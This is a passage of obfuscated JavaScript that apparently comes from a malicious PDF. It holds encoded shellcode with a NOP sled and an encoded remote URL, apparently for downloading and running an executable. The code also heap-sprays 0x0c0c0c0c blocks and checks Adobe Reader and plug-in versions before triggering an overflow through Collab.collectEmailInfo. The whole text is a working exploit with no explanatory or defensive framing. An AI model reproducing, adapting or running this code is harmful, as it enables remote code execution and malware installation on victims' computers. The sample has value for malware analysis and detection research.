"%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6170%u5446%u006f%u7468%u7074%u2f3a%u632f%u696c%u6b63%u632d%u696c%u6b63%u2e65%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6c70%u2f74%u306e%u3230%u3031%u3236%u3130%u3072%u3130%u4d39%u3262%u3738%u6361%u3839%u6352%u6130%u3866%u3331%u5839%u3536%u6133%u6464%u6439%u3359%u3638%u6137%u3663%u5a36%u3130%u3030%u3066%u3036";app.i3016NAHWu2AK4 = unescape(k2e221(nR_woX1_5JQIY8, dMbbD2Dr_80hsW));var n3r__l = 0x400000;var G_U_cSnot___dx = J536N5t76_n.length * 2;var dc5_crMIq = n3r__l - (G_U_cSnot___dx+0x38);I_Y__N1s10_j7v = w_vt_R1lrr72s(I_Y__N1s10_j7v, dc5_crMIq);var kFg_Iw0_6mih = (Qtm_84_38e - 0x400000)/n3r__l;for (var Q__2Eto = 0; Q__2Eto < kFg_Iw0_6mih; Q__2Eto++) {sq2R_V_i___atW[Q__2Eto] = I_Y__N1s10_j7v + J536N5t76_n;}}function O__b_u_U_xCq6F(){var OKDLt__tcU7_h5 = "";for (B_fE_pm = 0; B_fE_pm < 12; B_fE_pm++) {OKDLt__tcU7_h5 += unescape("%u0c0c%u0c0c");}var p06k7_2npTkN6 = "";for (B_fE_pm = 0; B_fE_pm < 750; B_fE_pm++) {p06k7_2npTkN6 += OKDLt__tcU7_h5;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: p06k7_2npTkN6});app.clearTimeOut(UE__y_0su);}function oQ22uJG7_5(OKNP07){var bBn_P1_XO1vXhUp = UE__y_0su;if ((OKNP07 >= 8 && OKNP07 < 8.11) || OKNP07 < 7.1) {poyA8_Q(23, "%u0c0c%u0c0c", OKNP07);O__b_u_U_xCq6F();}if (bBn_P1_XO1vXhUp) {app.clearTimeOut(bBn_P1_XO1vXhUp);}}var Vh_T2_A_ji = 0;var b7T36_5_4__6_Qc = app.plugIns;for (var x_1OF4 = 0; x_1OF4 < b7T36_5_4__6_Qc.length; x_1OF4++) {var AWP_E4_v0C_HH = b7T36_5_4__6_Qc[x_1OF4].version;if (AWP_E4_v0C_HH > Vh_T2_A_ji) { Vh_T2_A_ji = AWP_E4_v0C_HH; }}if (app.viewerVersion == 9.103 && Vh_T2_A_ji < 9.13) {Vh_T2_A_ji = 9.13;}app.f20lk151_1__4n = oQ22uJG7_5;UE__y_0su = app.setTimeOut("app.f20lk151_1__4n(" + Vh_T2_A_ji.toString() + ")", 50);